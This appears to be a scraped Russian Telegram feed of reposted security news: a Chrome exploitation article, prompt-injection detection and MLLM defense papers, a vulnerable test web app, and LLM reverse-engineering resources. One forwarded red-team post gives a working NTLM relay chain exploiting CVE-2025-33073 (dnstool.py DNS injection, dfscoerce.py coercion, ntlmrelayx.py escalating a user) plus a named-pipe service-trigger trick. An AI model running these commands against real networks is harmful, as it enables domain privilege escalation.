100-pravil-projectov-NASA.pdf
734.1 KB
Понравились 100 правил руководителей проектов
NASA. Взято с поста:
https://news.1rj.ru/str/tech_b0lt_Genona/5513
+ сам док
NASA. Взято с поста:
https://news.1rj.ru/str/tech_b0lt_Genona/5513
+ сам док
Forwarded from OPERATION ZERO RU
101 Chrome Exploitation — Part 1: Architecture
Опубликовали новую статью по эксплуатации Chrome. В ней описана архитектура браузера, его основные компоненты (движок рендеринга Blink, движок JavaScript V8, сетевой стек), а также упражнение, в котором читатели добавят свою функцию в API Blink. Приятного чтения.
https://opzero.ru/press/101-chrome-exploitation-part-1-architecture/
Опубликовали новую статью по эксплуатации Chrome. В ней описана архитектура браузера, его основные компоненты (движок рендеринга Blink, движок JavaScript V8, сетевой стек), а также упражнение, в котором читатели добавят свою функцию в API Blink. Приятного чтения.
https://opzero.ru/press/101-chrome-exploitation-part-1-architecture/
Operation Zero RU
101 Chrome Exploitation — Part 1: Architecture - Operation Zero RU
Modern web browsers have evolved from simple document viewers into sophisticated platforms capable of running complex web applications. At the heart of this transformation lies a carefully orchestrated architecture built around three fundamental components:…
🔥1🤯1
Forwarded from CyberSecurityTechnologies
web_agents_inject.pdf
5.6 MB
#AIOps
#MLSecOps
"WAInjectBench: Benchmarking Prompt Injection Detections for Web Agents", 2025.
]-> Comprehensive benchmark for prompt injection detection in web agents
// we presenting the first comprehensive benchmark study on detecting prompt injection attacks targeting web agents. We construct datasets containing both malicious and benign samples: malicious text segments generated by different attacks, benign text segments from four categories, malicious images produced by attacks, and benign images from two categories
#MLSecOps
"WAInjectBench: Benchmarking Prompt Injection Detections for Web Agents", 2025.
]-> Comprehensive benchmark for prompt injection detection in web agents
// we presenting the first comprehensive benchmark study on detecting prompt injection attacks targeting web agents. We construct datasets containing both malicious and benign samples: malicious text segments generated by different attacks, benign text segments from four categories, malicious images produced by attacks, and benign images from two categories
WAVSEP - это уязвимое веб-приложение, разработанное для оценки возможностей, качества и точности сканеров уязвимостей веб-приложений.
Содержит коллекцию уникальных уязвимых веб-страниц, которые можно использовать для тестирования различных свойств сканеров веб-приложений. 2015 год...
https://github.com/sectooladdict/wavsep
Содержит коллекцию уникальных уязвимых веб-страниц, которые можно использовать для тестирования различных свойств сканеров веб-приложений. 2015 год...
https://github.com/sectooladdict/wavsep
GitHub
GitHub - sectooladdict/wavsep: The Web Application Vulnerability Scanner Evaluation Project
The Web Application Vulnerability Scanner Evaluation Project - sectooladdict/wavsep
CrossGuard: Safeguarding MLLMs against Joint-Modal Implicit Malicious Attacks
https://github.com/AI45Lab/MLLMGuard
https://github.com/AI45Lab/MLLMGuard
FalseCrashReducer: Mitigating False Positive Crashes in
OSS-Fuzz-Gen Using Agentic AI
https://www.researchgate.net/publication/396143052_FalseCrashReducer_Mitigating_False_Positive_Crashes_in_OSS-Fuzz-Gen_Using_Agentic_AI
OSS-Fuzz-Gen Using Agentic AI
https://www.researchgate.net/publication/396143052_FalseCrashReducer_Mitigating_False_Positive_Crashes_in_OSS-Fuzz-Gen_Using_Agentic_AI
Forwarded from Proxy Bar
Forwarded from RedTeam brazzers (Миша)
Всем привет!
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
❤1
Список инструментов, статей и ресурсов, которые используют большие языковые модели (LLM) для обратного проектирования (RE), декомпиляции, бинарного анализа и исследований в области кибербезопасности.
https://github.com/ram-elgov/awesome-llm-reverse-engineering
https://github.com/ram-elgov/awesome-llm-reverse-engineering
GitHub
GitHub - ram-elgov/awesome-llm-reverse-engineering: A curated list of tools, papers, datasets, and resources that leverage Large…
A curated list of tools, papers, datasets, and resources that leverage Large Language Models (LLMs) for reverse engineering, decompilation, binary analysis, and cybersecurity research. - ram-elgov/...
Forwarded from GitHub Community
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1